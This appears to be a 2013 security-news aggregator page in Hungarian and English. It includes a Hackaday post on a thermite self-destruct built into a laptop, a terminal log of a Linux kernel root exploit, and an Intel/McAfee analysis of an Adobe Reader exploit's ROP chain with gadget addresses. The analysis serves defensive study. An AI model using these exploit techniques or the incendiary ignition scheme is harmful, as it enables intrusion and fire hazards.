Buherator

Tegnap számoltunk be arról a valódi, érvényes Apple Developer ID-vel rendelkező trójairól, amely kémkedett az áldozatok OS X alapú gépein. A vírusirtók egy jó része már felismeri, viszont beszámolók szerint több verziója is terjed.

[...] Bővebben!

Kiera Wilmot, the Florida high school student who was expelled from her school after an unauthorized science experiment was misperceived as a weapon (at least for purposes of arrest and charging), won't be going to jail. She will, though, be going to Space Camp, thanks to a crowdfunding campaign started by author and former NASA engineer Homer Hickham. All charges against her have been dropped.

Read more of this story at Slashdot.

Years ago we covered using thermite to destroy a hard drive. The idea is that if you melt through the platters, the data is completely unrecoverable.  There are tons of videos of people doing this, but they all have a similar format. There’s a hard drive, with a flower pot or soda can sitting on top full of thermite. They then light this with a strip of magnesium and a torch.

I wanted to do something a little different. I wanted to implement thermite as a self destruct mechanism inside the device. To do this, I had to come up with a way to ignite the thermite. This stuff is very difficult to light. You have to get it really really hot. The easiest way is to use magnesium, which itself isn’t the easiest thing to light.

What I finally landed on was an ignition system that uses model rocket igniters, gun powder, and magnesium to light the thermite.  The model rocket igniter can be set off from the 12v line inside your computer. However, it isn’t hot enough to light magnesium shavings, much less thermite. To get it to work, I needed to add some gunpowder. A small amount of gun powder would get hot enough to light the magnesium shavings, which in turn were hot enough to light the thermite. I had to be careful though, because too much gunpowder would cause a rapid expansion, blowing the thermite everywhere instead of lighting it. You can actually see some red thermite being blown out of the external hard drive and the laptop as the gunpowder ignites.

Effectiveness of external hard drive self destruction:

I wasn’t sure about this one. There isn’t a whole lot of space for thermite and the ignition system inside the box. On top of that, the only space was at the side of the hard drive, where the walls are the thickest. I had no idea if the small amount of thermite I used would penetrate the drive. It did, just barely as you can see in these pictures. It looks as if it pooled in the screw holes  and made it inside. The platters are damaged.

Effectiveness of laptop destruction:

I decided to completely replace the cd rom with thermite. This gave me a ton of space to put things. I was pretty positive this would work. The hard drive is in the center of this laptop, which meant I had to place it on its side for this to be effective. You can see the thermite work its way down toward the drive in the video. As you can see in the pictures below, the drive cover is completely gone and the platters are destroyed. Success!

Since this system can be powered by batteries or the internal power of your computer, it can be put inside a working device only to be used when needed. Obviously it is a ridiculous fire hazard that no one should bother with. It was a fun experiment though and I really feel like it is something that would fit in well in the world of [James Bond]

Filed under: chemistry hacks, computer hacks, Featured

A bíróság kötelezte az internetszolgáltatókat több oldal elérésének megakadályozására.

win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase

A csendben javított kritikus linux sebezhetőségre, amelyre három éve létezik exploit, most lecsapott Brad Spengler, a GRSecurity Linux kernel védelmi patch fejlesztője és portolta az eredeti exploit kódját a saját, Enlightenment nevű Linux kernel exploit keretrendszeréhez.

Az új verzió root jogokat szerez az Ubuntu 12.04 rendszereken és minden LSM alapú védelmet kikapcsol, AppArmortól az SELinuxig. A videó megtekinthető róla itt:

http://www.youtube.com/watch?v=llqxbMgIztk&hd=1

A problémát okozó PERF_EVENTS biztonsági hiba eredetileg csak 2.6.37 kerneleket és utánuk következőket érintette 3.8.10-ig, de a Red Hat sikeresen portolta vissza a sebezhetőséget az Enterprise Linux 6 esetén használt 2.6.32 verzióra is, így azok is támadhatók. Videó róla itt:

http://www.youtube.com/watch?v=WI0FXZUsLuI&hd=1

Az Oslo Freedom Forum egy évente megtartott rendezvény, amely annak lehetőségeit vizsgálja, hogy hogyan lehetne tiltakozni, fellépni a tekintélyelvűség ellen és amely a szabad és nyílt eszméket hirdeti. Az idei, május 13-tól 15-ig tartott konferencián volt egy workshop, amelyet szólásszabadság aktivistáknak rendeztek. Ezen a workshopon arról volt szó, hogy ezek az aktivisták hogyan próbálják megvédeni az általuk használt eszközöket a kormányzati megfigyelésekkel, lehallgatásokkal, ellenőrzésekkel szemben. A workshop alatt az egyik angolai résztvevő gépén Jacob Appelbaum felfedezett egy eddig még ismeretlen, OS X-es spyware-t, amelynek az az érdekessége, hogy egy érvényes Apple Developer ID-hoz tartozó tanúsítvánnyal írták alá. Mivel a malware megfelelően alá volt írva, a Gatekeeper nem jelzett a felhasználóknak.

Részletek az F-Secure blogjában.

GAME ENGINES: A 0-DAY’S TALE

The ownCloud developers have released versions 5.0.6, 4.0.15, and 4.5.11 to fix a number of serious vulnerabilities in their software including SQL injection, code execution and privilege escalation problems

...amelyre már kinn is van egy exploit attól, aki már 3 éve tudott róla.

hunger@hgc ~ $ uname -a
Linux hgc 3.2.43 #1 SMP Sat Apr 27 04:00:32 CEST 2013 x86_64 GNU/Linux
hunger@hgc ~ $ id
uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
hunger@hgc ~ $ ./a.out
2.6.37-3.x x86_64
2010
hgc ~ # id
uid=0(root) gid=0(root) groups=0(root),1000(hunger)
hgc ~ #

PaX UDEREF/KERNEXEC véd ellene.

https://news.ycombinator.com/item?id=5703758

A H Security azt állítja, hogy a Microsoft beleolvas a Skype-on keresztül küldött üzenetekbe. A weboldalt az egyik olvasó értesítette, aki azt állította, hogy szokatlan hálózati forgalmat észlelt azután, hogy egy Skype IM csevegést folytatott. Röviddel azután, hogy HTTPS URL-t küldött át az IM szolgáltatáson keresztül, az URL-t meglátogatták egy IP címről a Microsoft redmondi főhadiszállásáról. A H Security nekiállt tesztelni. Átküldött két HTTPS URL-t. Az egyik egy login információt tartalmazott, a másik pedig egy privát cloud-alapú fájlmegosztó szolgáltatásra mutatott. Az eredmény? Néhány órával később mindkét HTTPS URL-t meglátogatták egy IP-ről, amelyet a redmondi Microsoft-hoz regisztráltak.

A H Security szerint a Microsoft mind a login információkat, mind a privát cloud-alapú fájlmegosztó szolgáltatáshoz létrehozott spec. URL-t felhasználta.

A H Security kérdőre vonta a Skype-ot... A részletek itt olvashatók.

SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution

Linux Kernel open-time Capability file_ns_capable() Privilege Escalation

SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution

Linux PERF_EVENTS - Local Root Exploit

Meglepő eredmények egy brit felmérésben az illegális letöltésekről. Rossz üzlet a becsületes vevő.

Egy friss beszámoló szerint az eBay nevében jelentek meg ismeretlenek, akik látszólag a már jól ismert hivatalos chat ablakot kínálták, https-en, érvényes tanúsítvánnyal.

[...] Bővebben!

Several people have sent us this story. I’ve seen it everywhere. A lot of people are upset, on several sides.  A gun has been 3d printed that can actually fire a round.

First, we have people scared that this will bring undetectable guns to people who wouldn’t have had access before. Then we have the gun fans that are reacting to the others with shouts of freedom and liberty and stuff.  The 3d printing community has had mixed reactions, but many are concerned that this will harm 3d printing in general.

I simply don’t care.

It isn’t that I’m apathetic to people who are victims of gun violence. It isn’t that I’m apathetic about “gun rights”. I just think that this specific event makes no difference at all.  It is intriguing in the aspect that it is yet another “First!” for the 3d printer community, but beyond that I don’t care, keep the “firsts” coming.

Here are the different points that I have heard brought up.

1. Accessibility: People are concerned that guns will now end up in the hands of people who couldn’t have gotten them before.

I really don’t think this is a legitimate concern. You’ll note the machine that printed that gun. It wasn’t your average reprap. It cost as much as a small house. If you can afford that printer? You could afford a gun.  Lets just pretend your average reprap could print that gun though. Again, you’re going to have to either buy or build one. At this point, you would have been capable of just buying a gun or… building one.

I guess you could go use a friend’s printer to print your gun, but would that really be any more common than taking another person’s gun?

2. Printing restrictions and Legislation: 3d printer fans are scared that laws will be made that will stop them from printing things.

Do you own a lathe? A mill? You know you can make BETTER guns with those? That’s how the gun companies make them! It’s like you have a gun factory in your home! Actually, now that I think of it, they’re using .22 rimfire which can be fired in a pipe with a cap and a nail! How are hardware stores not illegal?

Listen, if they tell me I can’t print gun shaped things, I’ll probably print one just for spite. They aren’t going to enforce such a silly law, it would be impossible.  They can’t even build anything into the system like scanners that can’t scan money. Guns are too diverse and can be made from basic geometry.

3. Anti-Gun legislation: This may be used to push laws that limit firearms in some way.

Anti-gun legislation has so much gun violence to use as a foundation that a slight change in manufacturing really is a drop in the bucket. This won’t change their ability to restrict things. At least, I don’t think it will.

4. A legitimate concern: Detectability.

The only real issue I see here is that a 3d printed gun wouldn’t be detectable by metal detectors. Bullets are though aren’t they?

 

These are my opinions on the 3d printed gun. I’m not delving into gun control in general. Since these are opinions, they will most likely be ill-informed and incomplete. Feel free to participate in a civil discussion on the topic.

If you’re curious about whether I personally have a gun, I do not. I think I’m too clumsy to own a firearm. I am fairly sure I’d accidentally shoot someone when I did something stupid. Don’t get me wrong, I do dangerous things. Stupid, dangerous things.

Filed under: 3d Printer hacks, rants, weapons hacks

[This blog was primarily written by Xiaoning Li of Intel Labs, with assistance from Peter Szor of McAfee Labs.]

In February 2013, the Adobe Product Security Incident Response Team (PSIRT) released security advisory APSA13-02. In that report they listed two vulnerabilities (CVE-2013-0640 and CVE-2013-0641) that were widely exploited. At Intel Labs and McAfee Labs we ran some further analysis of these exploits and want to share some of the interesting details we discovered.

Based on information from the PSIRT, both vulnerabilities will impact all versions of Adobe Reader from 9.x to 11.x. (Some Acrobat versions are also vulnerable.) We verified this claim and found the sample affected all of them.

Attack Path

The exploit is spread by a malicious PDF file. When Reader opens the PDF file, it will trigger the vulnerability and start the exploit. This PDF file delivers a very complex attack, bypassing the current Adobe sandbox mechanism to launch the malware.

This flow shows the basic steps for the attack path:

The files D.T and L2P.T are DLLs in a sandboxed temp path, as in the following:

A new PDF is created in the normal temp path:

The new PDF, Visaform Turkey, will appear to hide the exploitation. The exploit uses a lot of memory in the background.

 

First Exploit

The PDF’s first exploit uses a heap overflow to overwrite a virtual function pointer, and also uses a memory information leak to bypass the address space layout randomization (ASLR) protection in Windows. Return-oriented programming is used to bypass data execution prevention (DEP).

Let’s sidetrack for a moment and look at two definitions: Return-oriented programming (ROP) is an exploit technique in which an attacker controls the call stack to indirectly execute arbitrary intended or unintended code to deliver an attack, thereby bypassing security features such as DEP. Stack pivoting is a common technique used by ROP-based exploits. Pointing the stack pointer to an attacker-owned buffer, such as the heap, will provide more flexibility for the attacker to carry out a complex ROP exploit.

Here’s how the exploit works from the first trigger point. The vulnerability is in AcroForm.api. After the exploit prepares customized stack data on the heap, the data triggers the exploit via following instructions in AcroForm.api.

With a modified virtual function pointer, the instruction calls into a special ROP gadget, which will start pivoting.

The address for the first gadget is 0x209b9f50. Here’s the original code:

But if we decode from 0x209b9f50, the code piece looks like what follows. This is the ROP gadget for stack pivoting:

Now the stack points to a fake stack in the heap. The code log in a debugger at runtime looks like this:

Once the customized stack works, it will start more ROP gadgets. When the next Ret instruction is called, the stack looks like this:

What’s the instruction for 0x6acc1049? It is offset 0×1049 from AcroForm.api because 0x6acc00 is the base address for the target module. Here is the unintended ROP gadget again:

The decoded ROP gadget is just a Ret instruction:

It will repeat from stack 0x11849a34 to stack 0x1184beb4, a whopping 9,344 (0×2480) times!

Let’s see what the stack content is now:

The next gadget will move the esp register to esi. It will control the stack itself.

The gadget still includes lots of return addresses with repeated patterns, such as these:

With related code pieces:

So the logic will write target memory with values in the ecx register. The same pattern will repeat many times to modify 0x6b55e001, which is the beginning of the data section of AcroForm.api.

The data from 0x6b55e001 to 0x6b55e04e is modified and writes several API/DLL names into the area of 0x6b55e001:

• GetTempPathA
• Fwrite
• Wb
• CryptStringToBinaryA
• Ntdll
• RtlDecompressBuffer
• Wcsstr

These strings are later used as parameters, during ROP-based API calls. After writing these strings into the data section, the ROP code continues with the following gadgets:

We can list the first piece of an ROP gadget step by step. The following code moves [esp] to ecx:

                                                                  6b218551

1184c074  cccc0240 6b022c74 6b19567b 6ad6ed72

1184c084  6b19567b 6b237664

 

6b218551 58              pop     eax

6b218552 c3              ret

 

6b022c74 0fb7c0       movzx   eax,ax

6b022c77 c3              ret

 

6b19567b 97              xchg    eax,edi

6b19567c c3              ret

 

6ad6ed72 01f7           add     edi,esi

6ad6ed74 c3              ret

 

6b19567b 97              xchg    eax,edi

6b19567c c3              ret

 

6b237664 91              xchg    eax,ecx

6b237665 c3              ret

The following code moves the pointer to eax, and then writes [eax] with the previous value in ecx:

                                                    6b218551 cccc023c

1184c094  6b022c74 6b19567b 6ad6ed72 6b1d943b

1184c0a4  6b16d51a

 

6b218551 58              pop     eax

6b218552 c3              ret

 

6b022c74 0fb7c0       movzx   eax,ax

6b022c77 c3              ret

 

6b19567b 97              xchg    eax,edi

6b19567c c3              ret

 

6ad6ed72 01f7           add     edi,esi

6ad6ed74 c3              ret

 

6b1d943b 57              push    edi

6b1d943c 58              pop     eax

6b1d943d c3              ret

 

6b16d51a 8908          mov     dword ptr [eax],ecx

6b16d51c c3              ret

The following code gets the LoadLibraryA() API pointer from the import table:

1184c0a4                                                        6b218551 6b32b234 6b1d92ac

6b218551 58              pop     eax

6b218552 c3              ret

6b1d92ac ff10            call    dword ptr [eax]

6b1d92ae c3               ret

At this point, the stack keeps the parameter for LoadLibraryA(). This is actually a string for MSVCR100.dll in the “idata” section.

Once the MSVCR100.dll handle is available via LoadLibraryA(), the following code writes the handle to the target address in the heap (actually the fake stack), which is used to call GetProcAddress() as the first parameter. The address is 0x1184c0e4.

1184c0b4                   6b237664 6b218551 cccc022c

1184c0c4  6b022c74 6b19567b 6ad6ed72 6b1d943b

1184c0d4  6b16d51a

 

6b237664 91              xchg    eax,ecx

6b237665 c3              ret

 

6b218551 58              pop     eax

6b218552 c3              ret

 

6b022c74 0fb7c0       movzx   eax,ax

6b022c77 c3              ret

 

6b19567b 97              xchg    eax,edi

6b19567c c3              ret

 

6ad6ed72 01f7           add     edi,esi

6ad6ed74 c3              ret

 

6b1d943b 57              push    edi

6b1d943c 58              pop     eax

6b1d943d c3              ret

 

6b16d51a 8908          mov     dword ptr [eax],ecx

6b16d51c c3              ret

Next the process calls the following gadgets to get function pointers for the wcsstr function. The first parameter is a DLL handle received from previous gadgets.

1184c0d4                    6b218551 6b32b1ec 6b1d92ac

 

6b218551 58              pop     eax

6b218552 c3              ret

 

6b1d92ac ff10            call    dword ptr [eax]

6b1d92ae c3              ret

Now it’s time to call the function with the jmp eax gadget.

1184c0e4                     6acce598

 

6acce598 ffe0            jmp     eax {MSVCR100!wcsstr (6c5f20f1)}

Here the code searches for the string “MODULE” from the heap or the fake stack. There is a long string in the heap following the “MODULE” signature. This is the encoded and compressed DLL D.T. With more gadgets, the code calls CryptStringToBinaryA() to convert this string to binary, and then calls RtlDecompressBuffer() to decompress the binary to the real D.T binary code in memory.

Similar ROP gadgets get ntdll.dll and related API addresses, for example, RtlDecompressBuffer() and CryptStringToBinaryA(). Finally, the ROP gadget calls GetTempPathA() to get the current temp path, the sandboxed path. It will create D.T under this path and call LoadLibraryA() to run the D.T. module.

D.T creates two threads. One shows error messages. The second creates and loads the DLL L2P.T, which exploits the second vulnerability to load L2P.T into a nonsandboxed acrord32 process. Finally this process terminates.

 

Second Exploit

The second exploit triggers the vulnerability at acrord32.exe:

Due to a heap overflow, the eax register calls to the stack-pivoting ROP gadget.

A few more ROP gadgets after stack pivoting load L2P.T in the same process. L2P.T creates another DLL, langbar.dll, which downloads the rest of the malware.

No Shell

After we reviewed all of the exploit code and corresponding ROP, we found that this exploit does not use any traditional shellcode. All API calls use the fake stack from the stack pivoting.

Mitigation

Stack pivoting is a very common technique to allow an exploit to run powerful gadgets with a fake stack. For this kind of complex case, it’s very hard to create a customized stack within the real stack instead of within a fake stack. Once an exploit can do stack pivoting, it can bypass different defense mechanisms. Evolving security solutions need to address this attack pattern. Stack pivoting creates a very complex ROP attack and is a good example of how exploitation techniques continue to evolve. This successful exploit bypasses both Adobe client security features and basic Windows DEP and ASLR defenses.

We thank our colleagues Haifei Li, Bing Sun, Xiaobo Chen, and Chong Xu for their help with this analysis.